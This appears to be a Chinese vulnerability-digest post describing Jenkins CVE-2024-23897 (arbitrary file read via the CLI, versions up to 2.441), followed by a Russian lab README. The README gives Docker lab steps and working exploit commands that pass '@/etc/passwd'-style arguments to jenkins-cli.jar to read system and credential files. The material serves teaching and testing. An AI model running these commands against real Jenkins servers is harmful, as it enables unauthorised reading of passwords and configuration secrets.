Jenkins Arbitrary File Read Vulnerability

漏洞信息

漏洞名称: Jenkins Arbitrary File Read Vulnerability

漏洞编号:

  • CVE: CVE-2024-23897

漏洞类型: 文件读取

漏洞等级: 高危

漏洞描述: Jenkins是一个开源的自动化服务器,广泛用于持续集成和持续交付(CI/CD)流程中,支持构建、部署和自动化项目。它因其强大的插件生态系统和灵活性,在企业级开发环境中被广泛使用。此次发现的漏洞CVE-2024-23897影响了Jenkins 2.441及更早版本,属于文件读取类型的安全漏洞。该漏洞的技术根源在于Jenkins的CLI(命令行接口)组件在处理用户输入时未能正确验证和限制文件路径,导致攻击者可以通过构造特定的命令参数,读取服务器上的任意文件。这种漏洞的利用不需要用户认证,攻击者可以远程执行攻击,从而可能导致敏感信息泄露,如系统密码文件、Jenkins配置信息等。由于Jenkins通常部署在内网环境中,一旦被攻击者利用,可能会进一步导致内网渗透和其他更严重的安全事件。因此,该漏洞的安全风险评级为高危,建议用户尽快升级到修复版本以避免潜在的安全威胁。

产品厂商: Jenkins

产品名称: Jenkins

影响版本: version <= 2.441

来源: https://github.com/Fineken/Jenkins-CVE-2024-23897-Lab

类型: CVE-2024:github search

仓库文件

  • COMMANDS.md
  • README.md
  • attack-scripts
  • docker-compose.yml
  • sensitive-files
  • test-files

来源概述

Jenkins CVE-2024-23897 Lab

Уязвимость чтения произвольных файлов в Jenkins 2.441 и ранее.

Запуск

1
docker-compose up -d

Автоматическая атака

1
docker exec -it attacker-host ./auto-exploit.sh

Ручная атака

1
2
3
4
5
6
7
8
9
docker exec -it attacker-host bash
cd /tmp
curl -o jenkins-cli.jar http://vulnerable-jenkins:8080/jnlpJars/jenkins-cli.jar

## Первая строка файла
java -jar jenkins-cli.jar -s http://vulnerable-jenkins:8080/ -http help "@/etc/passwd"

## Полный файл
java -jar jenkins-cli.jar -s http://vulnerable-jenkins:8080/ -http connect-node "@/etc/passwd"

Цели

  • /etc/passwd
  • /opt/test-files/secret.txt
  • /var/jenkins_home/config.xml

Остановка

1
docker-compose down

Jenkins Arbitrary File Read Vulnerability
http://example.com/2025/07/24/github_3235163491/
作者
lianccc
发布于
2025年7月24日
许可协议